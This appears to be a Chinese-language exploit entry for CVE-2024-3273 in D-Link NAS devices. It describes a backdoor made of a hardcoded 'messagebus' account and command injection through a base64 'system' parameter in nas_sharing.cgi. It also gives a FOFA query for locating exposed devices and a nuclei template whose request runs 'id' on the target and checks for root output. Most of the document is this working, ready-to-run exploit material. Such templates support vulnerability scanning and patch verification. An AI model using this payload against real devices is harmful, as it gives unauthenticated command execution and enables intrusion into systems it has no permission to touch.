D-Link

D-Link NAS 未授权RCE(CVE-2024-3273)

D-Link NAS nas_sharing.cgi接口存在命令执行漏洞，该漏洞存在于“/cgi-bin/nas_sharing.cgi”脚本中，影响其 HTTP GET 请求处理程序组件。漏洞成因是通过硬编码帐户（用户名：“messagebus”和空密码）造成的后门以及通过“system”参数的命令注入问题。未经身份验证的攻击者可利用此漏洞获取服务器权限。

fofa："Text:In order to access the ShareCenter, please make sure you are using a recent browser(IE 7+, Firefox 3+, Safari 4+, Chrome 3+, Opera 10+)"

nuclei

id: D-Link_NAS_rce

info: 
  name: D-Link_NAS_rce
  description: D-Link NAS 未授权RCE(CVE-2024-3273)
  author: BY
  severity: high
  tags: D-Link
  metadata:
    fofa: "Text:In order to access the ShareCenter, please make sure you are using a recent browser(IE 7+, Firefox 3+, Safari 4+, Chrome 3+, Opera 10+)"
    verified: true

requests:
  - raw:
      - |              
        GET /cgi-bin/nas_sharing.cgi?user=messagebus&passwd=&cmd=15&system={{base64("id")}} HTTP/1.1
        Host: {{hostname}}
        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Acoo Browser; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)
        Accept-Encoding: identity
        Accept: */*
        Connection: keep-alive
         
              
    matchers-condition: and 
    matchers:
      - type: status
        status:
          - 200

      - type: word
        words:
          - "uid="
          - "root"
        condition: or